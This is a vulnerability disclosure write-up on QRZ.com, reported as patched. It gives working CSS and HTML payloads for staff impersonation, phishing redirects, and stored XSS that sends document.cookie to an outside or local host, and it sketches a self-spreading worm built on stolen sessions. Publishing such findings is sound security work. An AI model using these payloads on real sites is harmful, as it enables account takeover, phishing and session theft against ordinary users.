Exploit 1, staff impersonation
In this exploit, I abuse the CSS styles to change my user-page to look identical to that of a QRZ.com staff member.
Using the CSS visibility: hidden;
property and :after
selector, I can change my visible user type to QRZ Engineering Manager.
Then, using the :before
and :after
selector, I load and place the staff and verified badges next to my profile image.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
/* CUSTOM CSS */ #ppic { position: relative; } #ppic:before{ position: absolute; left: -110px; content:url('https://s3.amazonaws.com/files.qrz.com/static/qrz/hq_staff_100x102.png'); } #ppic:after{ position: absolute; top: 116px; left: -116px; cursor: pointer; content:url('https://s3.amazonaws.com/files.qrz.com/static/ngassets/images/badges/idv_112x24.png'); } .csignm { font-size: 32pt !important; font-style: italic !important; color: #f00 !important; } .green { visibility: hidden; position: relative; } .green:after { content: "QRZ Engineering Manager"; color: #090; visibility: visible; margin-left: -80px; } |
Exploit 2, redirect to phishing, via user interaction
In this exploit, I abuse the visibility: hidden;
property once again, this time hiding all user related info, and navigation items, and only displaying the contents of the bio. Then, I can place a phishing redirect link in my bio, for the user to follow.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
/* CUSTOM CSS */ #calldata { display: none; } .ui-tabs-nav { display: none; } .f7 { display: none; } |
1 2 3 4 5 |
<!-- BIO HTML --> <h2 style="text-align: center">Your QRZ account has been deactivated.</h2> <p style="text-align: center;">Click <a href="http://drakeluce.com/vulnerable">here</a> to view your account status.</p> |
Exploit 3, redirect to phishing, automatic
In this exploit, I simply add an HTML meta refresh to the contents of my bio, and automatically redirect the user to a phishing page.
1 2 3 |
<!-- BIO HTML --> <meta http-equiv="refresh" content="0;url=https://drakeluce.com/vulnerable" /> |
Exploit 4, arbitrary JS execution, via user interaction
In this exploit, we go one step further. We can abuse the formaction
property of a button to execute arbitrary JavaScript. From this, we redirect the user to a malicious site, along with their current cookies. We can then steal their session cookie, and gain access to the users account.
1 2 3 |
<!-- BIO HTML --> <form><button formaction="javascript:window.location.replace('https://drakeluce.com/vulnerable/?cookie=' + encodeURIComponent(document.cookie))">Click here for free HAM stuff!</button></form> |
Exploit 5, arbitrary JS execution, automatic
This is the most pressing of all vulnerabilities.
We can abuse the srcdoc
property of an iframe to automatically execute malicious JavaScript, accomplishing the same Exploit 4, without user interaction.
Rather than redirecting the user to a page, we can simply make a request to a malicious server with the contents of document.cookie
, which will then log the session key. Once set up, you immediately gain full access to the account of any user who accesses your callsign page.
This access allows us to construct a JavaScript virus. We use the compromised session key to edit that users bio, adding the same malicious code. As more users visit callsign pages, this will propagate throughout the entire userbase until every active account on the website is compromised.
In addition, the xf_session
cookie also allows you to log-in to accounts that have explicitly logged-out, because logging-out only removes the client-side cookie. Sessions are not destroyed server-side, so they may be resumed.
1 2 3 4 5 6 7 |
<!-- BIO HTML --> <iframe style="display: none;" srcdoc="<img src=x:x onerror=a=document.createElement('img');a.src='http://localhost:3000/'+encodeURIComponent(document.cookie);window.top.document.body.appendChild(a);>" /> <!-- The above evaluates to: --> <iframe style="display: none;" srcdoc="<img src=x:x onerror=a=document.createElement('img');a.src='http://localhost:3000/'+encodeURIComponent(document.cookie);window.top.document.body.appendChild(a);>" /> |
NEW: Exploit 6, arbitrary JS execution, automatic (logbook)
The following pages in the QRZ logbook allow basic <script>
injection
- List page XSS:
- Reciever Info > Op
- Detail XSS:
- QSO Info > Info: Recieved
- QSO Info > Info: Sent
- Reciever Info > QTH
- QSL Info > QSL to VE9DLL Via
Notes
Disclaimers
- All vulnerabilities were disclosed using the responsible disclosure model.
- To ensure I didn’t capture any session keys other than my own during testing, all connections that gave me access to user data were made over
localhost
. Additionally, connections tohttps://drakeluce.com/vulnerable
simply displayed data back to the end user, and were not logged.
UPDATE (June 7th, 2018)
As of today, it appears all of the disclosed JavaScript vulnerabilities have been patched by the team at QRZ. This vulnerability report is now public.